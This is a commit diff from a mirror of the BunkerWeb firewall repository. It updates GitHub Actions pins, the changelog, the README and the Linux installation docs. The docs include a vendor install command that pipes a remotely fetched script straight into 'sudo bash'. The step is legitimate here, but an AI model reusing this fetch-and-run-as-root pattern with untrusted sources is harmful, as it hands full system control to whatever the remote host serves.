Elgato_dark/bunkerweb
1
0
Fork 0
mirror of https://github.com/bunkerity/bunkerweb synced 2026-05-24 09:28:37 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

Merge branch 'dev' into ui

Browse source
This commit is contained in:
Jordan Blasenhauer 2024-05-14 09:20:40 +02:00
commit 31d7ebfd24
661 changed files with 4896 additions and 125882 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
.github/workflows/beta.yml vendored
View file

@ -135,7 +135,7 @@ jobs:
versionrpm: ${{ steps.getversionrpm.outputs.versionrpm }}
steps:
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Get VERSION
id: getversion
run: echo "version=$(cat src/VERSION | tr -d '\n')" >> "$GITHUB_OUTPUT"

6
.github/workflows/codeql.yml vendored
View file

@ -19,7 +19,7 @@ jobs:
language: ["python", "javascript"]
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Set up Python 3.9
uses: actions/setup-python@82c7e631bb3cdc910f68e0081d67478d79c6982d # v5.1.0
if: matrix.language == 'python'
@ -35,12 +35,12 @@ jobs:
python -m pip install --no-cache-dir --require-hashes -r src/common/db/requirements.txt
echo "CODEQL_PYTHON=$(which python)" >> $GITHUB_ENV
- name: Initialize CodeQL
uses: github/codeql-action/init@d39d31e687223d841ef683f52467bd88e9b21c14 # v3.25.3
uses: github/codeql-action/init@ccf74c947955fd1cf117aef6a0e4e66191ef6f61 # v3.25.4
with:
languages: ${{ matrix.language }}
config-file: ./.github/codeql.yml
setup-python-dependencies: false
- name: Perform CodeQL Analysis
uses: github/codeql-action/analyze@d39d31e687223d841ef683f52467bd88e9b21c14 # v3.25.3
uses: github/codeql-action/analyze@ccf74c947955fd1cf117aef6a0e4e66191ef6f61 # v3.25.4
with:
category: "/language:${{matrix.language}}"

4
.github/workflows/container-build.yml vendored
View file

@ -45,7 +45,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Replace VERSION
if: inputs.RELEASE == 'testing' || inputs.RELEASE == 'dev'
run: ./misc/update-version.sh ${{ inputs.RELEASE }}
@ -117,7 +117,7 @@ jobs:
# Check OS vulnerabilities
- name: Check OS vulnerabilities
if: ${{ inputs.CACHE_SUFFIX != 'arm' }}
uses: aquasecurity/trivy-action@d710430a6722f083d3b36b8339ff66b32f22ee55 # v0.19.0
uses: aquasecurity/trivy-action@b2933f565dbc598b29947660e66259e3c7bc8561 # v0.20.0
with:
vuln-type: os
skip-dirs: /root/.cargo

4
.github/workflows/create-arm.yml vendored
View file

@ -33,7 +33,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Get ARM availabilities
id: availabilities
uses: scaleway/action-scw@be2696f261325a78354eda14988c80405f33e082
@ -66,7 +66,7 @@ jobs:
with:
args: instance server wait ${{ fromJson(steps.scw.outputs.json).ID }} zone=fr-par-2
- name: Wait for SSH
uses: iFaxity/wait-on-action@df89d0cf8089bb0c38e25279c74848ef313da53b
uses: iFaxity/wait-on-action@a7d13170ec542bdca4ef8ac4b15e9c6aa00a6866
with:
resource: tcp:${{ fromJson(steps.scw.outputs.json).public_ip.address }}:22
timeout: 300000

2
.github/workflows/dev-update-mmdb.yml vendored
View file

@ -12,7 +12,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
with:
fetch-depth: 0
token: ${{ secrets.BUNKERBOT_TOKEN }}

4
.github/workflows/dev.yml vendored
View file

@ -80,7 +80,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- id: set-matrix
run: |
tests=$(find ./tests/ui/ -name "*_page.py" -type f -printf "%f\n" | jq -c --raw-input --slurp 'split("\n")| .[0:-1]')
@ -113,7 +113,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- id: set-matrix
run: |
tests=$(find ./tests/core/ -maxdepth 1 -mindepth 1 -type d -printf "%f\n" | jq -c --raw-input --slurp 'split("\n")| .[0:-1]')

2
.github/workflows/doc-to-pdf.yml vendored
View file

@ -13,7 +13,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Install Python
uses: actions/setup-python@82c7e631bb3cdc910f68e0081d67478d79c6982d # v5.1.0
with:

2
.github/workflows/linux-build.yml vendored
View file

@ -37,7 +37,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Replace VERSION
if: inputs.RELEASE == 'testing' || inputs.RELEASE == 'dev' || inputs.RELEASE == 'ui'
run: ./misc/update-version.sh ${{ inputs.RELEASE }}

2
.github/workflows/push-doc.yml vendored
View file

@ -18,7 +18,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
with:
fetch-depth: 0
token: ${{ secrets.BUNKERBOT_TOKEN }}

2
.github/workflows/push-docker.yml vendored
View file

@ -33,7 +33,7 @@ jobs:
steps:
# Prepare
- name: Check out repository code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Login to Docker Hub
uses: docker/login-action@e92390c5fb421da1463c202d546fed0ec5c39f20 # v3.1.0
with:

6
.github/workflows/push-github.yml vendored
View file

@ -15,7 +15,7 @@ jobs:
runs-on: ubuntu-latest
steps:
# Checkout
- uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
- uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
# Get PDF doc
- name: Get documentation
if: inputs.VERSION != 'testing'
@ -51,7 +51,7 @@ jobs:
# Create release
- name: Create release
if: inputs.VERSION != 'testing'
uses: softprops/action-gh-release@9d7c94cfd0a1f3ed45544c887983e9fa900f0564 # v2.0.4
uses: softprops/action-gh-release@69320dbe05506a9a39fc8ae11030b214ec2d1f87 # v2.0.5
with:
body: |
Documentation : https://docs.bunkerweb.io/${{ inputs.VERSION }}/
@ -75,7 +75,7 @@ jobs:
# Create release
- name: Create release
if: inputs.VERSION == 'testing'
uses: softprops/action-gh-release@9d7c94cfd0a1f3ed45544c887983e9fa900f0564 # v2.0.4
uses: softprops/action-gh-release@69320dbe05506a9a39fc8ae11030b214ec2d1f87 # v2.0.5
with:
body: |
**The testing version of BunkerWeb should not be used in production, please use the latest stable version instead.**

4
.github/workflows/push-packagecloud.yml vendored
View file

@ -40,9 +40,9 @@ jobs:
steps:
# Prepare
- name: Check out repository code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Install ruby
uses: ruby/setup-ruby@1198b074305f9356bd56dd4b311757cc0dab2f1c # v1.175.1
uses: ruby/setup-ruby@cacc9f1c0b3f4eb8a16a6bb0ed10897b43b9de49 # v1.176.0
with:
ruby-version: "3.0"
- name: Install packagecloud

2
.github/workflows/release.yml vendored
View file

@ -143,7 +143,7 @@ jobs:
versionrpm: ${{ steps.getversionrpm.outputs.versionrpm }}
steps:
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Get VERSION
id: getversion
run: echo "version=$(cat src/VERSION | tr -d '\n')" >> "$GITHUB_OUTPUT"

2
.github/workflows/rm-arm.yml vendored
View file

@ -21,7 +21,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Delete ARM VM
uses: scaleway/action-scw@be2696f261325a78354eda14988c80405f33e082
with:

6
.github/workflows/scorecards-analysis.yml vendored
View file

@ -15,16 +15,16 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: "Checkout code"
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
with:
persist-credentials: false
- name: "Run analysis"
uses: ossf/scorecard-action@0864cf19026789058feabb7e87baa5f140aac736 # v2.3.1
uses: ossf/scorecard-action@dc50aa9510b46c811795eb24b2f1ba02a914e534 # v2.3.3
with:
results_file: results.sarif
results_format: sarif
publish_results: true
- name: "Upload SARIF results to code scanning"
uses: github/codeql-action/upload-sarif@d39d31e687223d841ef683f52467bd88e9b21c14 # v3.25.3
uses: github/codeql-action/upload-sarif@ccf74c947955fd1cf117aef6a0e4e66191ef6f61 # v3.25.4
with:
sarif_file: results.sarif

4
.github/workflows/staging-create-infra.yml vendored
View file

@ -21,9 +21,9 @@ jobs:
run: ssh-keygen -b 2048 -t rsa -f ~/.ssh/id_rsa -q -N "" && ssh-keygen -f ~/.ssh/id_rsa -y > ~/.ssh/id_rsa.pub && echo -e "Host *\n StrictHostKeyChecking no" > ~/.ssh/ssh_config
if: inputs.TYPE != 'k8s'
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Install terraform
uses: hashicorp/setup-terraform@97f030cf6dc0b4f5e0da352c7bca9cca34579800 # v3.1.0
uses: hashicorp/setup-terraform@651471c36a6092792c552e8b1bef71e592b462d8 # v3.1.1
- name: Install kubectl
uses: azure/setup-kubectl@3e0aec4d80787158d308d7b364cb1b702e7feb7f # v4.0.0
if: inputs.TYPE == 'k8s'

4
.github/workflows/staging-delete-infra.yml vendored
View file

@ -20,9 +20,9 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Install terraform
uses: hashicorp/setup-terraform@97f030cf6dc0b4f5e0da352c7bca9cca34579800 # v3.1.0
uses: hashicorp/setup-terraform@651471c36a6092792c552e8b1bef71e592b462d8 # v3.1.1
- uses: actions/download-artifact@65a9edc5881444af0b9093a5e628f2fe47ea3b2e # v4.1.7
with:
name: tf-${{ inputs.TYPE }}

11
.github/workflows/staging-tests.yml vendored
View file

@ -25,7 +25,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Login to ghcr
uses: docker/login-action@e92390c5fb421da1463c202d546fed0ec5c39f20 # v3.1.0
with:
@ -75,6 +75,9 @@ jobs:
- name: Pull BW linux ubuntu test image
if: inputs.TYPE == 'linux'
run: docker pull ghcr.io/bunkerity/ubuntu-tests:testing && docker tag ghcr.io/bunkerity/ubuntu-tests:testing local/ubuntu:latest
- name: Pull BW linux ubuntu noble test image
if: inputs.TYPE == 'linux'
run: docker pull ghcr.io/bunkerity/ubuntu-noble-tests:testing && docker tag ghcr.io/bunkerity/ubuntu-noble-tests:testing local/ubuntu-noble:latest
- name: Pull BW linux debian test image
if: inputs.TYPE == 'linux'
run: docker pull ghcr.io/bunkerity/debian-tests:testing && docker tag ghcr.io/bunkerity/debian-tests:testing local/debian:latest
@ -121,6 +124,12 @@ jobs:
env:
TEST_DOMAINS: ${{ secrets.TEST_DOMAINS_LINUX }}
ROOT_DOMAIN: ${{ secrets.ROOT_DOMAIN }}
- name: Run Linux ubuntu noble tests
if: inputs.TYPE == 'linux'
run: export $(echo "$TEST_DOMAINS" | xargs) && ./tests/main.py "linux" "ubuntu-noble"
env:
TEST_DOMAINS: ${{ secrets.TEST_DOMAINS_LINUX }}
ROOT_DOMAIN: ${{ secrets.ROOT_DOMAIN }}
- name: Run Linux debian tests
if: inputs.TYPE == 'linux'
run: export $(echo "$TEST_DOMAINS" | xargs) && ./tests/main.py "linux" "debian"

4
.github/workflows/staging.yml vendored
View file

@ -91,7 +91,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- id: set-matrix
run: |
tests=$(find ./tests/core/ -maxdepth 1 -mindepth 1 -type d -printf "%f\n" | jq -c --raw-input --slurp 'split("\n")| .[0:-1]')
@ -102,7 +102,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- id: set-matrix
run: |
tests=$(find ./tests/ui/ -name "*_page.py" -type f -printf "%f\n" | jq -c --raw-input --slurp 'split("\n")| .[0:-1]')

2
.github/workflows/test-core-linux.yml vendored
View file

@ -16,7 +16,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Set up Python 3.9
uses: actions/setup-python@82c7e631bb3cdc910f68e0081d67478d79c6982d # v5.1.0
with:

2
.github/workflows/test-core.yml vendored
View file

@ -16,7 +16,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Login to ghcr
uses: docker/login-action@e92390c5fb421da1463c202d546fed0ec5c39f20 # v3.1.0
with:

2
.github/workflows/tests-ui-linux.yml vendored
View file

@ -16,7 +16,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Set up Python 3.9
uses: actions/setup-python@82c7e631bb3cdc910f68e0081d67478d79c6982d # v5.1.0
with:

2
.github/workflows/tests-ui.yml vendored
View file

@ -15,7 +15,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Login to ghcr
uses: docker/login-action@e92390c5fb421da1463c202d546fed0ec5c39f20 # v3.1.0
with:

2
.github/workflows/ui.yml vendored
View file

@ -67,7 +67,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- id: set-matrix
run: |
tests=$(find ./tests/ui/ -name "*_page.py" -type f -printf "%f\n" | jq -c --raw-input --slurp 'split("\n")| .[0:-1]')

11
CHANGELOG.md
View file

@ -2,11 +2,15 @@
## v1.5.7 - ????/??/??
- [LINUX] Support Ubuntu 24.04 (Noble)
- [LINUX] Support RHEL 9.4 instead of 9.3
- [LINUX] Support hot reload with systemctl reload
- [BUGFIX] Fix rare error when the cache is not properly initialized and jobs are executed
- [BUGFIX] Fix bug when downloading new mmdb files
- [BUGFIX] Remove potential false positives with ModSecurity on the jobs page of the web UI
- [BUGFIX] Fix bwcli not working with Redis sentinel
- [BUGFIX] Fix potential issues when removing the bunkerweb Linux package
- [BUGFIX] Fix bug when antibot is enabled and User-Agent or IP address has changed
- [FEATURE] Add backup plugin to backup and restore easily the database
- [FEATURE] Add LETS_ENCRYPT_CLEAR_OLD_CERTS setting to control if old certificates should be removed when generating Let's Encrypt certificates (default is no)
- [FEATURE] Add DISABLE_DEFAULT_SERVER_STRICT_SNI setting to allow/block requests when SNI is unknown or unset (default is no)
@ -14,16 +18,21 @@
- [UI] General : fix select setting crop because of overflow and check if select is out of viewport to determine visible position
- [UI] General : show logs on UI when pre rendering issue
- [UI] General : Improve UI performance by using multiple workers for the web server and reducing the number of times we prompt a loading page
- [UI] General : handle word breaks on dynamic text content
- [UI] General : fix overflow issue with tables on Safari
- [UI] General : fix static resources issue with firefox leading to loop requests
- [UI] Global config : fix script error while fragment relate to a missing plugin
- [UI] Global config / services page : filtering settings now open plugin select to highlight remaining plugin
- [UI] Global config / services page : add combobox on plugin select open to search a plugin quick
- [UI] Global config / services page : add combobox on plugin select open to search a plugin quick
- [UI] Global config / services page : add order for settings to always respect the order defined in the plugin
- [UI] Services page : show any invalid setting value on setting modal and disabled save if case
- [UI] Reporting page : fix missing data and add new ones
- [UI] Account page : keep license key form even if pro register to easy update
- [UI] Wizard : Add the possibility to still configure reverse proxy even if an admin user already exists
- [AUTOCONF] Speedup autoconf process when we have multiple events in short period of time
- [DOCUMENTATION] Add upgrade procedure for 1.5.7+
- [DOCUMENTATION] Rename Migrating section to Upgrading
- [MISC] Drop support of ansible and vagrant integrations
- [MISC] Support custom bwcli commands using plugins
- [MISC] Add Docker labels in autoconf, bw, scheduler, and ui Dockerfiles
- [DEPS] Update Python base Docker image to version 3.12.3-alpine3.19

55
README.md
View file

@ -35,6 +35,8 @@
⚙️ <a href="https://config.bunkerweb.io/?utm_campaign=self&utm_source=github">Configurator</a>
&#124;
🗺️ <a href="https://threatmap.bunkerweb.io/?utm_campaign=self&utm_source=github">Threatmap</a>
&#124;
🔎 <a href="https://forms.gle/e3VgymAteYPnwM1j9">Feedbacks</a>
</p>
> 🛡️ Make security by default great again !
@ -141,12 +143,11 @@ The first concept is the integration of BunkerWeb into the target environment. W
The following integrations are officially supported :
- [Docker](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#docker)
- [Docker autoconf](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#docker-autoconf)
- [Swarm](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#swarm)
- [Kubernetes](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#kubernetes)
- [Linux](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#linux)
- [Ansible](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#ansible)
- [Vagrant](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#vagrant)
- [Docker autoconf](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#docker-autoconf)
- [Kubernetes](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#kubernetes)
- [Swarm](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#swarm)
- [Microsoft Azure](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#microsoft-azure)
## Settings
@ -276,7 +277,7 @@ List of supported Linux distros :
- Ubuntu 24.04 "Noble"
- Fedora 39
- RHEL 8.9
- RHEL 9.3
- RHEL 9.4
Repositories of Linux packages for BunkerWeb are available on [PackageCloud](https://packagecloud.io/bunkerity/bunkerweb), they provide a bash script to automatically add and trust the repository (but you can also follow the [manual installation](https://packagecloud.io/bunkerity/bunkerweb/install) instructions if you prefer).
@ -285,35 +286,15 @@ You will find more information in the [Linux section](https://docs.bunkerweb.io/
> [!IMPORTANT]
> As of Ubuntu 24.04, the `nginx` package is not available in the official repository. You will need to use the `jammy` repository to install NGINX 1.24.0. Also we do not yet run automated tests on Ubuntu 24.04, so please consider this version as experimental.
## Ansible
## Microsoft Azure
<p align="center">
<img alt="Ansible banner" src="https://github.com/bunkerity/bunkerweb/raw/v1.5.7/docs/assets/img/integration-ansible.svg" />
<img alt="Azure banner" src="https://github.com/bunkerity/bunkerweb/raw/v1.5.7/docs/assets/img/integration-azure.webp" />
</p>
List of supported Linux distros :
BunkerWeb is referenced in the [Azure Marketplace](https://azuremarketplace.microsoft.com/fr-fr/marketplace/apps/bunkerity.bunkerweb?tab=Overview) and a ARM template is available in the [misc folder](https://github.com/bunkerity/bunkerweb/raw/v1.5.7/misc/integrations/azure-arm-template.json).
- Debian 12 "Bookworm"
- Ubuntu 22.04 "Jammy"
- Ubuntu 24.04 "Noble"
- Fedora 39
- RHEL 8.9
- RHEL 9.3
[Ansible](https://www.ansible.com/) is an IT automation tool. It can configure systems, deploy software, and orchestrate more advanced IT tasks such as continuous deployments or zero downtime rolling updates.
A specific BunkerWeb Ansible role is available on [Ansible Galaxy](https://galaxy.ansible.com/bunkerity/bunkerweb) (source code is available [here](https://github.com/bunkerity/bunkerweb-ansible)).
You will find more information in the [Ansible section](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#ansible) of the documentation.
## Vagrant
We maintain ready to use Vagrant boxes hosted on Vagrant cloud for the following providers :
- virtualbox
- libvirt
You will find more information in the [Vagrant section](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#vagrant) of the documentation.
You will find more information in the [Microsoft Azure section](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#microsoft-azure) of the documentation.
# Quickstart guide
@ -370,13 +351,13 @@ Here is the list of "official" plugins that we maintain (see the [bunkerweb-plug
| Name | Version | Description | Link |
| :------------: | :-----: | :------------------------------------------------------------------------------------------------------------------------------- | :-------------------------------------------------------------------------------------------------: |
| **ClamAV** | 1.4 | Automatically scans uploaded files with the ClamAV antivirus engine and denies the request when a file is detected as malicious. | [bunkerweb-plugins/clamav](https://github.com/bunkerity/bunkerweb-plugins/tree/main/clamav) |
| **Coraza** | 1.4 | Inspect requests using a the Coraza WAF (alternative of ModSecurity). | [bunkerweb-plugins/coraza](https://github.com/bunkerity/bunkerweb-plugins/tree/main/coraza) |
| **CrowdSec** | 1.4 | CrowdSec bouncer for BunkerWeb. | [bunkerweb-plugins/crowdsec](https://github.com/bunkerity/bunkerweb-plugins/tree/main/crowdsec) |
| **Discord** | 1.4 | Send security notifications to a Discord channel using a Webhook. | [bunkerweb-plugins/discord](https://github.com/bunkerity/bunkerweb-plugins/tree/main/discord) |
| **Slack** | 1.4 | Send security notifications to a Slack channel using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/slack) |
| **VirusTotal** | 1.4 | Automatically scans uploaded files with the VirusTotal API and denies the request when a file is detected as malicious. | [bunkerweb-plugins/virustotal](https://github.com/bunkerity/bunkerweb-plugins/tree/main/virustotal) |
| **WebHook** | 1.4 | Send security notifications to a custom HTTP endpoint using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/webhook) |
| **ClamAV** | 1.5 | Automatically scans uploaded files with the ClamAV antivirus engine and denies the request when a file is detected as malicious. | [bunkerweb-plugins/clamav](https://github.com/bunkerity/bunkerweb-plugins/tree/main/clamav) |
| **Coraza** | 1.5 | Inspect requests using a the Coraza WAF (alternative of ModSecurity). | [bunkerweb-plugins/coraza](https://github.com/bunkerity/bunkerweb-plugins/tree/main/coraza) |
| **CrowdSec** | 1.5 | CrowdSec bouncer for BunkerWeb. | [bunkerweb-plugins/crowdsec](https://github.com/bunkerity/bunkerweb-plugins/tree/main/crowdsec) |
| **Discord** | 1.5 | Send security notifications to a Discord channel using a Webhook. | [bunkerweb-plugins/discord](https://github.com/bunkerity/bunkerweb-plugins/tree/main/discord) |
| **Slack** | 1.5 | Send security notifications to a Slack channel using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/slack) |
| **VirusTotal** | 1.5 | Automatically scans uploaded files with the VirusTotal API and denies the request when a file is detected as malicious. | [bunkerweb-plugins/virustotal](https://github.com/bunkerity/bunkerweb-plugins/tree/main/virustotal) |
| **WebHook** | 1.5 | Send security notifications to a custom HTTP endpoint using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/webhook) |
You will find more information in the [plugins section](https://docs.bunkerweb.io/1.5.7/plugins/?utm_campaign=self&utm_source=github) of the documentation.

5
TODO
View file

@ -1,5 +0,0 @@
- Ansible
- Vagrant
- Plugins
- Find a way to do rdns in background
- fix db warnings (Got an error reading communication packets)

8
docs/assets/img/integration-azure-deploy.svg Normal file
View file

File diff suppressed because one or more lines are too long
Side by side

After

Width:  |  Height:  |  Size: 7.4 KiB

BIN
docs/assets/img/integration-azure.webp Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 19 KiB

8
docs/concepts.md
View file

@ -11,12 +11,10 @@ The first concept is the integration of BunkerWeb into the target environment. W
The following integrations are officially supported :
- [Docker](integrations.md#docker)
- [Docker autoconf](integrations.md#docker-autoconf)
- [Swarm](integrations.md#swarm)
- [Kubernetes](integrations.md#kubernetes)
- [Linux](integrations.md#linux)
- [Ansible](integrations.md#ansible)
- [Vagrant](integrations.md#vagrant)
- [Docker autoconf](integrations.md#docker-autoconf)
- [Kubernetes](integrations.md#kubernetes)
- [Swarm](integrations.md#swarm)
If you think that a new integration should be supported, do not hesitate to open a [new issue](https://github.com/bunkerity/bunkerweb/issues) on the GitHub repository.

889
docs/integrations.md
View file

@ -304,6 +304,222 @@ networks:
name: bw-docker
```
## Linux
<figure markdown>
![Overview](assets/img/integration-linux.svg){ align=center, width="600" }
<figcaption>Linux integration</figcaption>
</figure>
Supported Linux distributions for BunkerWeb (amd64/x86_64 and arm64/aarch64 architectures) include:
- Debian 12 "Bookworm"
- Ubuntu 22.04 "Jammy"
- Ubuntu 24.04 "Noble"
- Fedora 39
- Red Hat Enterprise Linux (RHEL) 8.9
- Red Hat Enterprise Linux (RHEL) 9.4
Please ensure that you have **NGINX 1.24.0 installed before installing BunkerWeb**. For all distributions, except Fedora, it is mandatory to use prebuilt packages from the [official NGINX repository](https://nginx.org/en/linux_packages.html). Compiling NGINX from source or using packages from different repositories will not work with the official prebuilt packages of BunkerWeb. However, you have the option to build BunkerWeb from source.
To simplify the installation process, Linux package repositories for BunkerWeb are available on [PackageCloud](https://packagecloud.io/bunkerity/bunkerweb). They provide a bash script that automatically adds and trusts the repository. You can follow the provided script for automatic setup, or opt for [manual installation](https://packagecloud.io/bunkerity/bunkerweb/install) instructions if you prefer.
=== "Debian"
The first step is to add NGINX official repository :
```shell
sudo apt install -y curl gnupg2 ca-certificates lsb-release debian-archive-keyring && \
curl https://nginx.org/keys/nginx_signing.key | gpg --dearmor \
| sudo tee /usr/share/keyrings/nginx-archive-keyring.gpg >/dev/null && \
echo "deb [signed-by=/usr/share/keyrings/nginx-archive-keyring.gpg] \
http://nginx.org/packages/debian `lsb_release -cs` nginx" \
| sudo tee /etc/apt/sources.list.d/nginx.list
```
You should now be able to install NGINX 1.24.0 :
```shell
sudo apt update && \
sudo apt install -y nginx=1.24.0-1~$(lsb_release -cs)
```
!!! warning "Testing/dev version"
If you use the `testing` or `dev` version, you will need to add the `force-bad-version` directive to your `/etc/dpkg/dpkg.cfg` file before installing BunkerWeb.
```shell
echo "force-bad-version" | sudo tee -a /etc/dpkg/dpkg.cfg
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.deb.sh | sudo bash && \
sudo apt update && \
sudo -E apt install -y bunkerweb=1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `apt upgrade`, you can use the following command :
```shell
sudo apt-mark hold nginx bunkerweb
```
=== "Ubuntu"
!!! example "Specifications for Ubuntu 24.04"
As of Ubuntu 24.04, the `nginx` package is not available in the official repository. You will need to use the `jammy` repository to install NGINX 1.24.0.
